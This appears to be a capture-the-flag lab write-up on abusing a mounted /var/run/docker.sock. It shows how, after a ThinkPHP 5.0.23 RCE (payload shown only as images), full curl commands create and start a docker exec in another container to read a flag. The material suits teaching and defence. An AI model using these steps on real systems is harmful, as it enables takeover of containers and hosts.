What will happen if a docker management system has RCE vulnerability?
testing environment(a simple ctf game)
- container_1: a think thinkphp5.0 web application(a simple docker management system)
- container_2: another web application(flag in it)
0x01 What is Docker Engine API?
-
Officinal Docs
- The Docker Engine API is a RESTful API accessed by an HTTP client such as wget or curl, or the HTTP library which is part of most modern programming languages.
-
Examples
- Run a container:
$ curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "alpine", "Cmd": ["echo","hello world"]}' -X POST http:/ip:port/containers/create{"Id":"container_id","Warnings":null} $ curl --unix-socket /var/run/docker.sock -X POST http:/ip:port/containers/container_id/start $ curl --unix-socket /var/run/docker.sock -X POST http:/ip:port/containers/container_id/wait{"StatusCode":0} $ curl --unix-socket /var/run/docker.sock "http:/ip:port/containers/container_id/logs?stdout=1"hello world
- List and manage containers
$ curl --unix-socket /var/run/docker.sock http:/ip:port/containers/json
- Stop all running containers
$ curl --unix-socket /var/run/docker.sock http:/ip:port/containers/json $ curl --unix-socket /var/run/docker.sock -X POST http:/ip:port/containers/container_id/stop
- List all images
$ curl --unix-socket /var/run/docker.sock http:/ip:port/images/json
- and so on
- Run a container:
0x02 Someting about the file /var/run/docker.sock
- Short answer: it's the Unix socket the Docker daemon listens on by default, and it can be used to communicate with the daemon from within a container.
-
Examples
-
communicate with the daemon within a container
- I've mounted the host's / var / run / docker. sock file into the container.
-
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json(Container interior) - 1754_1.png
- Through the api, we can operate docker daemon when we Inside the container.
-
communicate with the daemon within a container
0x03 Build a test env
- container_1:
- mounted the host's /var/run/docker.sock file into the container
-
chmod 666 /var/run/docker.sock(otherwise, the www-data user will not be able to access it) - apache2 + php + a php app(docker managment system)
- container_2:
- we should operate this container to get flag
0x04 How we can get the flag?
- thinkphp5.0.23 has a RCE vulnerability
- payload
- 1756_1.png
- 1758_1.png
- We can execute system commands through this vulnerability
-
exec:
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json- 1760_1.png
-
container_1:(a thinkphp5.0.23 web app)
- controller: Index.php
<?php
namespace app\index\controller;
class Index{
public function index(){
$content = json_decode(`curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json`, true);
$i = 1;
//var_dump($content);
echo "<h1>容器管理系统</h1>";
echo "<h2>正在运行的容器:</h2>";
foreach ($content as $value){
echo '容器'.$i.'<br>';
$i++;
echo "Id:".$value['Id']."<br>";
echo "Name:".$value['Names'][0]."<br><br>";
}
}
}
- 1768_1.png
-
container_2:
- we should execute 'cat /flag' in container_2 when we in container_1.
- what should we do?
-
- create a exec by the RCE of thinkpgp5.0.23
curl -s --unix-socket /var/run/docker.sock -H "Content-Type:application/json" -d '{"AttachStdin": false,+"AttachStdout": true,+"AttachStderr": true, "DetachKeys": "ctrl-p,ctrl-q", "Tty": false, "Cmd": ["cat","/flag"], "Env": ["FOO=bar", "BAZ=quux"]}' http://localhost/containers/689c87c0befa/exec- 1762_1.png
-
- start the exec
curl -s --unix-socket /var/run/docker.sock -H "Content-Type:application/json" -d '{"AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "DetachKeys": "ctrl-p,ctrl-q", "Tty": false, "Cmd": ["date"], "Env": ["FOO=bar", "BAZ=quux"]}' http://localhost/exec/3c664f72279fe6623fcf023b60d74e34719853cfc657b1274c441f3edc3c18c6/start- 1764_1.png
-
- get the flag
- 1766_1.png
-
we almost can do anything by exec
